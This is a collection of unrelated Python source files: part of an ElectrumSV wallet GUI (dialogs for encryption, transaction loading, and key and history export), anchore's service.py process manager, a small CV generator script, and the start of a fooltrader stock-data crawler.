public_key = PublicKey.from_hex(pubkey_e.text())
except Exception as e:
self.logger.exception("")
self.show_warning(_('Invalid Public key'))
else:
encrypted = public_key.encrypt_message_to_base64(message)
encrypted_e.setText(encrypted)
def encrypt_message(self, public_key_str=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(630, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
pubkey_e.setText(public_key_str)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
def do_decrypt(checked=False):
# pylint: disable=no-value-for-parameter
self.do_decrypt(message_e, pubkey_e, encrypted_e)
b.clicked.connect(do_decrypt)
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
if not txt:
return None
hex_str = tx_from_str(txt)
tx = Transaction.from_hex(hex_str)
if self.wallet:
my_coins = self.wallet.get_spendable_coins(None, self.config)
my_outpoints = [coin.key() for coin in my_coins]
for txin in tx.inputs:
outpoint = (txin.prev_hash, txin.prev_idx)
if outpoint in my_outpoints:
my_index = my_outpoints.index(outpoint)
txin.value = my_coins[my_index].value
return tx
def read_tx_from_qrcode(self):
data = qrscanner.scan_barcode(self.config.get_video_device())
if not data:
return
# if the user scanned a bitcoin URI
if web.is_URI(data):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
return self.tx_from_text(data)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
with open(fileName, "r") as f:
file_content = f.read()
tx_file_dict = json.loads(file_content.strip())
return self.tx_from_text(file_content)
def do_process_from_qrcode(self):
try:
tx = self.read_tx_from_qrcode()
if tx:
self.show_transaction(tx)
except Exception as reason:
self.logger.exception(reason)
self.show_critical(_("ElectrumSV was unable to read the transaction:") +
"\n" + str(reason))
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"),
_("Load transaction"))
try:
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
except Exception as reason:
self.logger.exception(reason)
self.show_critical(_("ElectrumSV was unable to read the transaction:") +
"\n" + str(reason))
def do_process_from_file(self):
try:
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
except Exception as reason:
self.logger.exception(reason)
self.show_critical(_("ElectrumSV was unable to read the transaction:") +
"\n" + str(reason))
def do_process_from_txid(self):
from electrumsv import transaction
prompt = _('Enter the transaction ID:') + '\u2001' * 30 # em quad
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), prompt)
if ok and txid:
txid = str(txid).strip()
try:
hex_str = self.network.request_and_wait('blockchain.transaction.get', [txid])
except Exception as exc:
d = UntrustedMessageDialog(
self, _("Transaction Lookup Error"),
_("The server was unable to locate the transaction you specified."),
exc)
d.exec()
return
tx = transaction.Transaction.from_hex(hex_str)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(
_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It can not be "backed up" by simply exporting these private keys.')
)
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "\n".join([
_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties.")
])
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrumsv-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr.to_string()] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join('{}\t{}'.format(addr, privkey)
for addr, privkey in private_keys.items())
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText(
"Please wait... %d/%d" % (len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("ElectrumSV was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
with open(labelsFile, 'r') as f:
data = f.read()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("ElectrumSV was unable to import your labels.") + "\n" +
str(reason))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"),
'electrumsv_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("ElectrumSV was unable to export your labels.") + "\n" +
str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrumsv-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("ElectrumSV was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason),
title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.export_history()
lines = []
for item in history:
if is_csv:
lines.append([item['txid'], item.get('label', ''),
item['confirmations'], item['value'], item['date']])
else:
lines.append(item)
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash", "label", "confirmations",
"value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText())
def enable_sweep():
sweep_button.setEnabled(bool(get_address_text()
and get_priv_keys()))
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
if not d.exec_():
return
try:
self.do_clear()
coins, keypairs = sweep_preparations(get_priv_keys(), self.network.get_utxos)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except Exception as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except Exception as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") +
':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_private_key(x, password))
#
# Preferences dialog and its signals.
#
def on_num_zeros_changed(self):
self.history_list.update()
self.history_updated_signal.emit()
self.address_list.update()
def on_fiat_ccy_changed(self):
'''Called when the user changes fiat currency in preferences.'''
b = app_state.fx and app_state.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def on_base_unit_changed(self):
edits = self.amount_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.history_list.update()
self.history_updated_signal.emit()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
for tx_dialog in self.tx_dialogs:
tx_dialog.update()
def on_fiat_history_changed(self):
self.history_list.refresh_headers()
def on_fiat_balance_changed(self):
self.address_list.refresh_headers()
self.address_list.update()
def preferences_dialog(self):
dialog = PreferencesDialog(self.wallet)
dialog.exec_()
def ok_to_close(self):
# Close our tx dialogs; return False if any cannot be closed
for tx_dialog in list(self.tx_dialogs):
if not tx_dialog.close():
return False
return True
def closeEvent(self, event):
if self.ok_to_close():
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.clean_up()
self.cleaned_up = True
event.accept()
else:
event.ignore()
def clean_up(self):
if self.network:
self.network.unregister_callback(self.on_network)
if self.tx_notify_timer:
self.tx_notify_timer.stop()
self.tx_notify_timer = None
self.network_status_task.cancel()
# We catch these errors with the understanding that there is no recovery at
# this point, given user has likely performed an action we cannot recover
# cleanly from. So we attempt to exit as cleanly as possible.
try:
self.config.set_key("is_maximized", self.isMaximized())
self.config.set_key("console-history", self.console.history[-50:], True)
except (OSError, PermissionError):
self.logger.exception("unable to write to config (directory removed?)")
if not self.isMaximized():
try:
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),g.width(),g.height()])
except (OSError, PermissionError):
self.logger.exception("unable to write to wallet storage (directory removed?)")
# Should be no side-effects in this function relating to file access past this point.
if self.qr_window:
self.qr_window.close()
for keystore in self.wallet.get_keystores():
if isinstance(keystore, Hardware_KeyStore):
app_state.device_manager.unpair_xpub(keystore.xpub)
self.logger.debug(f'closing wallet {self.wallet.storage.path}')
self.app.timer.timeout.disconnect(self.timer_actions)
self.app.close_window(self)
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + app_state.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit()
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + app_state.base_unit())
if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
if new_tx is None:
self.show_error(_('CPFP no longer valid'))
return
self.show_transaction(new_tx)
|
service.py
|
import os
import re
import sys
import time
import click
import psutil
import importlib
import threading
import subprocess
import anchore_engine.configuration.localconfig
from watchdog.observers import Observer
from watchdog.events import RegexMatchingEventHandler
import anchore_manager.util
import anchore_manager.util.db
import anchore_manager.util.logging
import anchore_manager.util.proc
from anchore_manager.util.proc import ExitCode, fail_exit, doexit
from anchore_manager.util.logging import log_error, logger
import anchore_engine.db.entities.common
service_map = {
"analyzer": "anchore-worker",
"simplequeue": "anchore-simplequeue",
"apiext": "anchore-api",
"catalog": "anchore-catalog",
"policy_engine": "anchore-policy-engine",
}
class AnchoreLogWatcher(RegexMatchingEventHandler):
regexes = [re.compile(".*/anchore-.*\.log$")]
files = {}
def do_close(self, event):
if event.src_path in self.files and self.files[event.src_path]["filehandle"]:
self.files[event.src_path]["filehandle"].close()
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
def on_deleted(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
self.do_close(event)
def on_modified(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
if not self.files[event.src_path]["filehandle"]:
if os.path.exists(event.src_path):
self.files[event.src_path]["filehandle"] = open(event.src_path)
if self.files[event.src_path]["filehandle"]:
patt = re.match(".*anchore-(.*)\.log$", event.src_path)
if patt:
logname = patt.group(1)
else:
logname = event.src_path
for line in self.files[event.src_path]["filehandle"].readlines():
sys.stdout.write("[service:" + str(logname) + "] " + line)
self.files[event.src_path]["filetell"] = self.files[event.src_path][
"filehandle"
].tell()
def on_created(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
if self.files[event.src_path]["filehandle"]:
self.do_close(event)
if os.path.exists(event.src_path):
self.files[event.src_path]["filehandle"] = open(event.src_path)
self.files[event.src_path]["filetell"] = 0
def on_moved(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
self.on_created(event)
def on_any_event(self, event):
if event.src_path not in self.files:
self.files[event.src_path] = {"filehandle": None, "filetell": 0}
class ServiceThread:
def __init__(self, thread_target, thread_args):
self.thread_target = thread_target
self.thread_args = thread_args
self.start()
def start(self):
self.thread = threading.Thread(target=self.thread_target, args=self.thread_args)
self.thread.name = self.thread_args[0]
self.thread.start()
def terminate_service(service, flush_pidfile=False):
pidfile = "/var/run/anchore/" + service + ".pid"
try:
logger.info(
"Looking for pre-existing service ({}) pid from pidfile ({})".format(
service, pidfile
)
)
thepid = None
if os.path.exists(pidfile):
with open(pidfile, "r") as FH:
thepid = int(FH.read())
if thepid:
# get some additional information about the pid to determine whether or not to run the kill operations
thepid_is_theservice = False
try:
running_pid = psutil.Process(thepid)
cmdline = running_pid.cmdline()
if pidfile in cmdline:
thepid_is_theservice = True
logger.info(
"Found existing service ({}) running with pid ({})".format(
service, thepid
)
)
else:
logger.info(
"Found pid running but belongs to unrelated process - skipping terminate"
)
except Exception as err:
thepid_is_theservice = False
if thepid_is_theservice:
try:
logger.info(
"Terminating existing service ({}) with pid ({}) using signal 0".format(
service, thepid
)
)
os.kill(thepid, 0)
except OSError:
pass
else:
logger.info(
"Terminating existing service ({}) with pid ({}) using signal 9".format(
service, thepid
)
)
os.kill(thepid, 9)
if flush_pidfile:
logger.info(
"Removing stale pidfile ({}) for service ({})".format(
pidfile, service
)
)
os.remove(pidfile)
except Exception as err:
logger.info(
"Could not detect/shut down running service ({}) - exception: {}".format(
service, str(err)
)
)
def startup_service(service, configdir):
pidfile = "/var/run/anchore/" + service + ".pid"
logfile = "/var/log/anchore/" + service + ".log"
# os.environ['ANCHORE_LOGFILE'] = logfile
logger.info("cleaning up service: {}".format(str(service)))
terminate_service(service, flush_pidfile=True)
twistd_cmd = "twistd"
for f in ["/bin/twistd", "/usr/local/bin/twistd"]:
if os.path.exists(f):
twistd_cmd = f
cmd = [
twistd_cmd,
"--logger=anchore_engine.subsys.twistd_logger.logger",
"--pidfile",
pidfile,
"-n",
service,
"--config",
configdir,
]
logger.info("starting service: {}".format(str(service)))
logger.info("\t {}".format(" ".join(cmd)))
try:
newenv = os.environ.copy()
newenv["ANCHORE_LOGFILE"] = logfile
pipes = subprocess.Popen(cmd, env=newenv)
sout, serr = pipes.communicate()
rc = pipes.returncode
raise Exception("process exited: " + str(rc))
except Exception as err:
logger.exception(
"service process exited at ({}): {}".format(str(time.ctime()), str(err))
)
logger.fatal("Could not start service due to: {}".format(str(err)))
logger.info("exiting service thread")
return False
config = {}
module = None
@click.group(name="service", short_help="Service operations")
@click.pass_obj
def service(ctx_config):
global config, module
config = ctx_config
@service.command(name="list", short_help="List valid service names")
@click.option(
"--anchore-module", help="Module to list services for", default="anchore_engine"
)
def do_list(anchore_module):
click.echo("Locally installed and available service types:")
from anchore_engine.service import BaseService
# Expects a services module within the base module
importlib.import_module(anchore_module + ".services")
for name in BaseService.registry.keys():
click.echo(name)
doexit(ExitCode.ok)
return
@service.command(name="start", short_help="Start anchore-engine")
@click.argument("services", nargs=-1)
@click.option(
"--no-auto-upgrade",
is_flag=True,
default=False,
help="Do not perform automatic upgrade on startup",
)
@click.option(
"--anchore-module",
nargs=1,
help="Name of anchore module to call DB routines from (default=anchore_engine)",
)
@click.option(
"--skip-config-validate",
nargs=1,
help="Comma-separated list of configuration file sections to skip specific validation processing (e.g. services,credentials,webhooks)",
)
@click.option(
"--skip-db-compat-check",
is_flag=True,
help="Skip the database compatibility check.",
)
@click.option("--all", is_flag=True, default=False)
def start(
services,
no_auto_upgrade,
anchore_module,
skip_config_validate,
skip_db_compat_check,
all,
):
"""
Startup and monitor service processes. Specify a list of service names or empty for all.
"""
global config
ecode = ExitCode.ok
if not anchore_module:
module_name = "anchore_engine"
else:
module_name = str(anchore_module)
if os.environ.get(
"ANCHORE_ENGINE_SKIP_DB_COMPAT_CHECK", str(skip_db_compat_check)
).lower() in ["true", "t", "y", "yes"]:
skip_db_compat_check = True
else:
skip_db_compat_check = False
if services:
input_services = list(services)
else:
input_services = os.getenv("ANCHORE_ENGINE_SERVICES", "").strip().split()
if not input_services and not all:
raise click.exceptions.BadArgumentUsage(
"No services defined to start. Must either provide service arguments, ANCHORE_ENGINE_SERVICES env var, or --all option"
)
try:
validate_params = {"services": True, "webhooks": True, "credentials": True}
if skip_config_validate:
try:
items = skip_config_validate.split(",")
for item in items:
validate_params[item] = False
except Exception as err:
raise Exception(err)
# find/set up configuration
configdir = config["configdir"]
configfile = os.path.join(configdir, "config.yaml")
localconfig = None
if os.path.exists(configfile):
try:
localconfig = anchore_engine.configuration.localconfig.load_config(
configdir=configdir,
configfile=configfile,
validate_params=validate_params,
)
except Exception as err:
raise Exception("cannot load local configuration: " + str(err))
else:
raise Exception("cannot locate configuration file ({})".format(configfile))
# load the appropriate DB module
try:
logger.info("Loading DB routines from module ({})".format(module_name))
module = importlib.import_module(module_name + ".db.entities.upgrade")
except Exception as err:
raise Exception(
"Input anchore-module ("
+ str(module_name)
+ ") cannot be found/imported - exception: "
+ str(err)
)
# get the list of local services to start
startFailed = False
if not input_services:
config_services = localconfig.get("services", {})
if not config_services:
logger.warn("could not find any services to execute in the config file")
sys.exit(1)
input_services = [
name
for name, srv_conf in list(config_services.items())
if srv_conf.get("enabled")
]
services = []
for service_conf_name in input_services:
if service_conf_name in list(service_map.values()):
svc = service_conf_name
else:
svc = service_map.get(service_conf_name)
if svc:
services.append(svc)
else:
logger.warn(
"specified service {} not found in list of available services {} - removing from list of services to start".format(
service_conf_name, list(service_map.keys())
)
)
if "anchore-catalog" in services:
services.remove("anchore-catalog")
services.insert(0, "anchore-catalog")
if not services:
logger.error(
"No services found in ANCHORE_ENGINE_SERVICES or as enabled in config.yaml to start - exiting"
)
sys.exit(1)
# preflight - db checks
try:
db_params = anchore_engine.db.entities.common.get_params(localconfig)
# override db_timeout since upgrade might require longer db session timeout setting
try:
if "timeout" in db_params.get("db_connect_args", {}):
db_params["db_connect_args"]["timeout"] = 86400
elif "connect_timeout" in db_params.get("db_connect_args", {}):
db_params["db_connect_args"]["connect_timeout"] = 86400
except Exception as err:
pass
anchore_manager.util.db.connect_database(db_params, db_retries=300)
code_versions, db_versions = anchore_manager.util.db.init_database(
upgrade_module=module,
localconfig=localconfig,
do_db_compatibility_check=(not skip_db_compat_check),
)
in_sync = False
timed_out = False
max_timeout = 3600
timer = time.time()
while not in_sync and not timed_out:
code_versions, db_versions = module.get_versions()
if code_versions and db_versions:
if code_versions["db_version"] != db_versions["db_version"]:
if not no_auto_upgrade and "anchore-catalog" in services:
logger.info("Performing upgrade.")
try:
# perform the upgrade logic here
rc = module.run_upgrade()
if rc:
logger.info("Upgrade completed")
else:
logger.info("No upgrade necessary. Completed.")
except Exception as err:
raise err
in_sync = True
else:
logger.warn(
"this version of anchore-engine requires the anchore DB version ({}) but we discovered anchore DB version ({}) in the running DB - it is safe to run the upgrade while seeing this message - will retry for {} more seconds.".format(
str(code_versions["db_version"]),
str(db_versions["db_version"]),
str(max_timeout - int(time.time() - timer)),
)
)
time.sleep(5)
else:
logger.info("DB version and code version in sync.")
in_sync = True
else:
logger.warn(
"no existing anchore DB data can be discovered, assuming bootstrap"
)
in_sync = True
if (max_timeout - int(time.time() - timer)) < 0:
timed_out = True
if not in_sync:
raise Exception(
"this version of anchore-engine requires the anchore DB version ("
+ str(code_versions["db_version"])
+ ") but we discovered anchore DB version ("
+ str(db_versions["db_version"])
+ ") in the running DB - please perform the DB upgrade process and retry\n"
"See: https://engine.anchore.io/docs/install/upgrade/#advanced--manual-upgrade-procedure"
)
except Exception as err:
raise err
finally:
rc = anchore_engine.db.entities.common.do_disconnect()
# start up services
logger.info("Starting services: {}".format(services))
for supportdir in ["/var/log/anchore", "/var/run/anchore"]:
try:
if not os.path.exists(supportdir):
os.makedirs(supportdir, 0o755)
except Exception as err:
logger.error(
"cannot create log directory {} - exception: {}".format(
supportdir, str(err)
)
)
raise err
pids = []
keepalive_threads = []
for service in services:
pidfile = "/var/run/anchore/" + service + ".pid"
try:
terminate_service(service, flush_pidfile=True)
service_thread = ServiceThread(startup_service, (service, configdir))
keepalive_threads.append(service_thread)
max_tries = 30
tries = 0
alive = True
while not os.path.exists(pidfile) and tries < max_tries:
logger.info(
"waiting for service pidfile {} to exist {}/{}".format(
pidfile, tries, max_tries
)
)
try:
alive = service_thread.thread.is_alive()
except:
pass
if not alive:
logger.info("service thread has stopped {}".format(service))
break
time.sleep(1)
tries = tries + 1
logger.info(
"auto_restart_services setting: {}".format(
localconfig.get("auto_restart_services", False)
)
)
if not localconfig.get("auto_restart_services", False):
logger.info(
"checking for startup failure pidfile={}, is_alive={}".format(
os.path.exists(pidfile), alive
)
)
if not os.path.exists(pidfile) or not alive:
raise Exception(
"service thread for ({}) failed to start".format(service)
)
time.sleep(1)
except Exception as err:
startFailed = True
logger.warn("service start failed - exception: {}".format(str(err)))
break
if startFailed:
logger.fatal(
"one or more services failed to start. cleanly terminating the others"
)
for service in services:
terminate_service(service, flush_pidfile=True)
sys.exit(1)
else:
# start up the log watchers
try:
observer = Observer()
observer.schedule(AnchoreLogWatcher(), path="/var/log/anchore/")
observer.start()
try:
while True:
time.sleep(1)
if localconfig.get(
"auto_restart_services", False
): # 'auto_restart_services' in localconfig and localconfig['auto_restart_services']:
for service_thread in keepalive_threads:
if not service_thread.thread.is_alive():
logger.info(
"restarting service: {}".format(
service_thread.thread.name
)
)
service_thread.start()
except KeyboardInterrupt:
observer.stop()
observer.join()
except Exception as err:
logger.error(
"failed to startup log watchers - exception: {}".format(str(err))
)
raise err
except Exception as err:
log_error("servicestart", err)
ecode = ExitCode.failed
doexit(ecode)
|
cvgen.py
|
#!/usr/bin/env python3
import sys
if not (sys.version_info[0] >= 3 and sys.version_info[1] >= 5):
raise Exception("This program needs Python 3.5 or newer to be executed.")
if len(sys.argv) < 2:
raise Exception("This program needs a JSON file to be passed as first command line parameter.")
from os.path import join, dirname, realpath
try:
from PIL import __version__
pillow_version = float(''.join(__version__.rsplit(".", 1)))
if pillow_version < 4.2: raise ImportError
sys.path.append(join(dirname(realpath(__file__)), "top"))
sys.path.append(join(dirname(realpath(__file__)), "center"))
sys.path.append(join(dirname(realpath(__file__)), "bottom"))
from time import time, sleep
from threading import Thread
from cv import Cv
out = None
start = time()
def loader():
for c in __import__("itertools").cycle(["|", "/", "-", "\\"]):
if out: break
sys.stdout.write("\rGenerating CV... " + c)
sys.stdout.flush()
sleep(0.1)
print("\rCV successfully generated (%.2fs elapsed): %s" % (time() - start, out))
Thread(target=loader).start()
out = Cv(sys.argv[1]).generate()
except ImportError:
from subprocess import check_call
command = ' '.join([sys.executable, "-m", "pip", "install", "-r", "requirements.txt"])
print("Trying to install missing dependencies with command: %s" % command)
check_call(command.split())
command = ' '.join([sys.executable, join(dirname(realpath(__file__)), sys.argv[0]), sys.argv[1]])
print("Running the program again after installing missing dependencies: %s" % command)
check_call(command.split())
|
datamanager.py
|
import argparse
import logging
import os
from multiprocessing import Process
import pandas as pd
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from fooltrader import settings
from fooltrader.api import event
from fooltrader.api.finance import get_balance_sheet_items, get_income_statement_items, get_cash_flow_statement_items
from fooltrader.api.quote import get_security_list, get_latest_download_trading_date, get_trading_dates, \
get_available_tick_dates, get_kdata
from fooltrader.contract.files_contract import get_balance_sheet_path, get_income_statement_path, \
get_cash_flow_statement_path
from fooltrader.settings import STOCK_START_CODE, STOCK_END_CODE, US_STOCK_CODES
from fooltrader.spiders.america.america_list_spider import AmericaListSpider
from fooltrader.spiders.america.america_stock_finance_spider import AmericaStockFinanceSpider
from fooltrader.spiders.america.america_stock_kdata_spider_163 import AmericaStockKdataSpider
from fooltrader.spiders.security_list_spider import SecurityListSpider
from fooltrader.spiders.stock.sina_category_spider import SinaCategorySpider
from fooltrader.spiders.stock.stock_summary_spider import StockSummarySpider
from fooltrader.spiders.stock_finance_report_event_spider import StockFinanceReportEventSpider
from fooltrader.spiders.stock_finance_spider import StockFinanceSpider
from fooltrader.spiders.stock_kdata_spider import StockKDataSpider
from fooltrader.spiders.stock_kdata_spider_163 import StockKdataSpider163
from fooltrader.spiders.stock_tick_spider import StockTickSpider
from fooltrader.utils.utils import get_report_date
logger = logging.getLogger(__name__)
def crawl(spider, setting):
process = CrawlerProcess({**get_project_settings(), **setting})
process.crawl(spider)
process.start()
def process_crawl(spider, setting):
p = Process(target=crawl, args=(spider, setting))
p.start()
p.join(5 * 60)
def crawl_usa_stock_data():
# crawl the stock list
process_crawl(AmericaListSpider, {})
# crawl the kdata
for _, security_item in get_security_list(security_type='stock', exchanges=['nasdaq'],
codes=US_STOCK_CODES).iterrows():
process_crawl(AmericaStockKdataSpider, {"security_item": security_item})
# crawl the finance data
# process_crawl(AmericaStockFinanceSpider, {"security_item": security_item})
# crawl index data
# process_crawl(Sp500Spider, {})
def crawl_stock_meta():
# 更新股票列表
# TODO:看是否有必要判断有新股上市,目前每天抓一次列表,问题不大
if True:
logger.info('download stock list start')
process_crawl(SecurityListSpider, {})
logger.info('download stock list finish')
